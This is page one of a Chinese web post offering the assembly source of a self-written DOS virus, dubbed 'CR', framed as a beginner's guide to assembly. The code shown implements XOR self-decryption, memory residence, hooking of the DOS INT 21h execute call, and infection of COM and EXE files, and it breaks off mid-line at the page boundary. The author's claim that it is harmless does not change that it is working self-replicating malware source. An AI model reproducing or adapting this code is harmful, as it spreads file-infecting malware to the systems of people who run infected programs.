• 当前位置:首页>>汇编语言>>汇编语言相关源码>>自己用汇编语言写的一个病毒(源码)
  • 自己用汇编语言写的一个病毒(源码)
  • 这个病毒虽然比较简单。但是麻雀虽小,五脏俱全。隐藏,感染,加密等模块应有尽有(只是不会破坏),是一个比较标准的DOS病毒,可以感染.EXE(不包括PE)和.COM的可执行文件。
    如果您希望学习汇编语言,用这个程序作为入门指导倒是比较合适的。
    染毒文件会被打上“CR”的标记,我们姑且称它为CR病毒吧。
    baseoff equ 107h
    
    
    
    code	segment
    
    	assume cs:code,ds:code,es:code,ss:code
    
    	org 100h
    
    main:	
    
    	mov ax,offset begin
    
    	jmp ax
    
    	
    
    	db 'cr'
    
    		
    
    begin:	
    
    	push es
    
    	push ds
    
    	
    
    	mov ax,cs
    
    	mov ds,ax
    
    	mov es,ax
    
    	
    
    	call get_ip	
    
    	push ax
    
    	mov ax,offset encodebegin
    
    	jmp short get_ip_end
    
    	
    
    oldhead	db 0h,4ch,0cdh,21h,6 dup (?)
    
    
    
    get_ip	label near
    
    	mov bp,sp
    
    	mov bx,[bp]
    
    	ret
    
    get_ip_end:
    
    	sub bx,112h		;get current offset
    
    	add ax,bx
    
    	push ax
    
    	pop di
    
    	mov si,di
    
    	cld
    
    	mov cx, offset endtag-offset encodebegin
    
    	mov dl, byte ptr [oldhead+bx]
    
    	push si
    
    decode:	
    
    	lodsb
    
    	xor al,dl
    
    	stosb			;decode at runtime
    
    	loop decode
    
    	retf			;retf  cs:ip=encodebegin
    
    	db 62h
    
    	db 65h
    
    
    
    encodebegin:
    
    	mov ax,9f80h
    
    	mov es,ax
    
    	cmp es:word ptr [virustag-baseoff],7263h
    
    	jz alreadyresident		
    
    	
    
    	push ds	
    
    	mov ax,40h
    
    	mov ds,ax
    
    	mov di,13h	;get free memory
    
    	sub word ptr [di],2
    
    	pop ds
    
    
    
    	mov di,0
    
    	mov si,bx
    
    	add si,baseoff
    
    	mov cx,2048
    
    	cld
    
    
    
    	rep movsb	;resident in memory
    
    	
    
    	nop
    
    	push bx
    
    	
    
    	mov ax,9f80h
    
    	mov ds,ax
    
    	mov ax,3521h
    
    	int 21h
    
    	mov ds:word ptr[oldint21-baseoff],bx
    
    	mov dx,bx
    
    	mov ds:word ptr[oldint21-baseoff+2h],es
    
    	
    
    	mov dx,offset newint21proc-baseoff
    
    	mov ax,2521h
    
    	int 21h
    
    
    
    	mov dx,offset newint12proc-baseoff
    
    	mov ax,2512h
    
    	int 21h
    
    	pop bx
    
    	
    
    alreadyresident:
    
    	mov ax,cs
    
    	mov ds,ax
    
    	mov es,ax
    
    	mov si,offset oldhead
    
    	add si,bx
    
    	mov di,0100h
    
    	
    
    	cmp cs:word ptr oldhead[bx],6163h	;this is an infected EXE file 
    
    	jz GotoExe
    
    	
    
    	cld
    
    	mov cx,7
    
    	rep movsb
    
    	
    
    	pop ds
    
    	pop es
    
    	
    
    	cmp cs:word ptr oldhead[bx],4c00h
    
    	jz go_out
    
    GotoOldHead:					;this is an infected COM file
    
    	mov ax,0100h
    
    	jmp ax
    
    GotoExe:
    
    	pop ds
    
    	pop es
    
    	mov ax,ds
    
    	add ax,cs:ini_ss[bx]			;set old ss
    
    	add ax,10h
    
    	mov ss,ax
    
    	mov ax,cs:ini_sp[bx]			;set old sp
    
    	mov sp,ax
    
    	mov ax,ds
    
    	add ax,10h
    
    	add cs:ini_cs[bx],ax			;set old cs
    
    	jmp cs:dword ptr ini_ip[bx]		;jump to the normal EXE 
    
    go_out:
    
    	mov ah,4ch
    
    	int 21h
    
    	
    
    oldint21 dw 2 dup(?)
    
    filehead db 18h dup (?)
    
    filesize dw 2 dup(?)
    
    virustag db 'cr'
    
    infecthead:	
    
    	mov ax,offset begin
    
    	jmp ax
    
    	db 'cr'
    
    temp	dw ?
    
    
    
    ini_ip	dw ?
    
    ini_cs	dw ?
    
    ini_ss	dw ?
    
    ini_sp	dw ?
    
    
    
    newint21proc:
    
    	cmp ah,4bh
    
    	jz tryinfect
    
    	jmp int21h
    
    tryinfect:
    
    	push ax			;begin to infect
    
    	push cx
    
    	push es
    
    	push di
    
    	push bx
    
    	push dx
    
    	push ds
    
    
    
    	mov ax,3d02h
    
    	int 21h
    
    	jnc openok
    
    	jmp notinfect		;open fail? not infect
    
    openok:	
    
    	push ds
    
    	push dx
    
    	push cs
    
    	pop ds
    
    	mov dx,offset filehead-baseoff
    
    	mov bx,ax
    
    	mov cx,18h
    
    	mov ah,3fh
    
    	int 21h	
    
    	pop dx
    
    	pop ds
    
    	jc closefilenear		;read fail? not infect
    
    	
    
    	mov di,offset filehead-baseoff
    
    	mov ax,9f80h
    
    	mov es,ax
    
    	
    
    	cmp word ptr es:[di],5a4dh	;'MZ' in head? EXE file...
    
    	jnz COM_infect
    
    	jmp EXE_infect
    
    	
    
    COM_infect:	
    
    	cmp word ptr es:[di+5],7263h	;'cr' in 105h? not infect
    
    	jz closefilenear   
    
    
    
    	call getfilesize
    
    	cmp dx,0
    
    	jnz closefilenear			; file is too big..not infect
    
    	cmp ax,63000
    
    	ja  closefilenear			; file is too big..not infect
    
    	cmp ax,10
    
    	jb  closefilenear			; file is too small..not infect
    
    	
    
    	;infect begin,hahahahaha....
    
    	jmp infectbegin
    
    closefilenear:
    
    	jmp closefile
    
    infectbegin:	
    
    	mov ax,9f80h
    
    	mov ds,ax
    
    	mov es,ax
    
    	mov si,offset filehead-baseoff
    
    	mov di,offset oldhead-baseof

    [1] [2] 下一页  

  • 上一篇:读寄存器内容的源代码
    下一篇:hello,world!win32汇编小程序